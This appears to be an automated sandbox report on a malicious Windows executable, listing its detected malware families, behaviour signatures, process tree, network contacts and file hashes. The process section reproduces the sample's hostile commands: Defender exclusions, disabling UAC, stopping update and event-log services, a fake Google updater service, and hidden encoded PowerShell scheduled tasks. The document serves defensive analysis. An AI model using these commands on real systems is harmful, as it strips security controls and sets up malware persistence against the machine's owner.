Analysis Overview
SHA256
08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856
Threat Level: Known bad
The file 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe was found to be: Known bad.
Malicious Activity Summary
DcRat
xmrig
Lumma Stealer
UAC bypass
Windows security bypass
Socks5Systemz
Djvu Ransomware
SmokeLoader
Stealc
Amadey
UPX dump on OEP (original entry point)
Detects executables packed with VMProtect.
Detects executables (downlaoders) containing URLs to raw contents of a paste
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables packed with or use KoiVM
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
XMRig Miner payload
Detect binaries embedding considerable number of MFA browser extension IDs.
Drops file in Drivers directory
Creates new service(s)
Blocklisted process makes network request
Stops running service(s)
Downloads MZ/PE file
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Windows security modification
Drops startup file
Loads dropped DLL
Modifies file permissions
Checks BIOS information in registry
Checks computer location settings
Unexpected DNS network traffic destination
Reads data files stored by FTP clients
UPX packed file
Executes dropped EXE
Drops desktop.ini file(s)
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Looks up external IP address via web service
Enumerates connected drives
Checks whether UAC is enabled
Drops Chrome extension
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Program crash
Enumerates physical storage devices
NSIS installer
Checks processor information in registry
Enumerates system info in registry
Creates scheduled task(s)
Runs ping.exe
Modifies data under HKEY_USERS
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of UnmapMainImage
Suspicious use of SetWindowsHookEx
System policy modification
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-15 02:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 02:01
Reported
2024-03-15 02:03
Platform
win7-20240221-en
Max time kernel
9s
Max time network
154s
Command Line
Signatures
Amadey
Djvu Ransomware
SmokeLoader
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
xmrig
Detect binaries embedding considerable number of MFA browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables (downlaoders) containing URLs to raw contents of a paste
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with VMProtect.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with or use KoiVM
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX dump on OEP (original entry point)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bsik9hWLX8TuLLCcHcOuy4Am.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyvqQmcj7CKDrZb8pSqlgPeI.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVjA36lsHqCR8je6lfJdLLai.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1176 set thread context of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe
"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1176 -s 768
C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe
"C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe"
C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
"C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe"
C:\Users\Admin\Pictures\NqpPj3yz5Tax23hlO38w94Tb.exe
"C:\Users\Admin\Pictures\NqpPj3yz5Tax23hlO38w94Tb.exe"
C:\Users\Admin\AppData\Local\Temp\is-T9COE.tmp\xu9BFB7O4AHpyqKeeF8VSj4J.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T9COE.tmp\xu9BFB7O4AHpyqKeeF8VSj4J.tmp" /SL5="$6016E,1511216,54272,C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe"
C:\Users\Admin\Pictures\OBvn2pn32QFv2fhf3uItXlPI.exe
"C:\Users\Admin\Pictures\OBvn2pn32QFv2fhf3uItXlPI.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -i
C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe
"C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -s
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe
"C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe"
C:\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe
.\Install.exe /QnjvBdidv "385118" /S
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\4D55.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPfwHkElh" /SC once /ST 00:26:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPfwHkElh"
C:\Windows\system32\taskeng.exe
taskeng.exe {518B6E4C-EAEA-46AE-B39B-CFCEE8C5867E} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDGHIDBKJE.exe"
C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe
"C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe"
C:\Users\Admin\AppData\Local\Temp\8C78.exe
C:\Users\Admin\AppData\Local\Temp\8C78.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPfwHkElh"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe\" tC /rmsite_idUkD 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\8C78.exe
C:\Users\Admin\AppData\Local\Temp\8C78.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f8e83638-66ca-4ebb-8358-3437f89cb012" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\system32\taskeng.exe
taskeng.exe {5A96A6D0-AF67-4A85-94D7-3F1D7F83F748} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\8C78.exe
"C:\Users\Admin\AppData\Local\Temp\8C78.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\8C78.exe
"C:\Users\Admin\AppData\Local\Temp\8C78.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe
C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe tC /rmsite_idUkD 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gYIRtCzHc" /SC once /ST 00:19:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gYIRtCzHc"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | voxel.dofuly.info | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 91.92.250.47:80 | 91.92.250.47 | tcp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| NL | 91.92.250.47:80 | 91.92.250.47 | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 104.21.62.68:80 | voxel.dofuly.info | tcp |
| RU | 81.94.159.197:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | 564675367.xyz | udp |
| SE | 192.229.221.95:80 | tcp | |
| SK | 45.95.11.69:443 | tcp | |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| HN | 138.204.181.135:80 | sdfjhuz.com | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| HN | 138.204.181.135:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| KR | 211.53.230.67:80 | sajdfue.com | tcp |
Files
memory/1176-0-0x0000000000C40000-0x0000000000CA6000-memory.dmp
memory/1176-1-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
memory/1176-2-0x000000001AF00000-0x000000001AF80000-memory.dmp
memory/1176-3-0x00000000020B0000-0x000000000210C000-memory.dmp
memory/3036-8-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
memory/2500-9-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2500-11-0x0000000000400000-0x0000000000408000-memory.dmp
memory/3036-13-0x0000000002310000-0x0000000002318000-memory.dmp
memory/2500-14-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2500-16-0x0000000000400000-0x0000000000408000-memory.dmp
memory/3036-17-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp
memory/2500-20-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3036-19-0x0000000002680000-0x0000000002700000-memory.dmp
memory/2500-21-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2500-24-0x0000000000400000-0x0000000000408000-memory.dmp
memory/3036-27-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp
memory/2500-26-0x0000000000400000-0x0000000000408000-memory.dmp
memory/3036-22-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp
memory/3036-29-0x0000000002680000-0x0000000002700000-memory.dmp
memory/3036-28-0x0000000002680000-0x0000000002700000-memory.dmp
memory/3036-30-0x0000000002680000-0x0000000002700000-memory.dmp
memory/3036-31-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp
memory/2500-32-0x0000000074670000-0x0000000074D5E000-memory.dmp
memory/2500-33-0x00000000004A0000-0x00000000004E0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\TarAC1E.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe
| MD5 | 825441372bbba175c241a1cf4c798438 |
| SHA1 | 84c1e2f2a24b338666dc98b64b266335b7fae5e9 |
| SHA256 | c307873c80fd5892e04c45d29ccc3f0ad506f0e77d768f20426851434df2f933 |
| SHA512 | 08c009748b1e4167d933e4e8443dac4600a0b5d1281fbbb660a28fb26682d9d6da46f39f1640ee3ffa3bc5b3dd3ee87b400a9b007b98cffedbd75e360ec2ac18 |
\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
| MD5 | d3fafdcf62abb08e17466e3e91f9c0f8 |
| SHA1 | 6c014928dc2081d045222a10c69ba7ac8cd2f99d |
| SHA256 | 31fe8a4582a7ee1640fe369571d7350146333af9d1851658acb33f7409af04f4 |
| SHA512 | 39eb0b2b71dcad844c8a030d6657759f3dac34fc50dc25951ebb80b5fde4fe96c0a3759d0d9db213bb93d5e4257745b4b37205cabe95c26e3f47bc1153fcb0e1 |
C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
| MD5 | cbb00bd4986b6826051769bd5a806f07 |
| SHA1 | fc3fd3f7b3f7a15de61c11e48bcc384fbcfa047f |
| SHA256 | 18252c1c6ad286fb22a26d8d9d6de39bf25c712829aae99b8d25a915aa3059e4 |
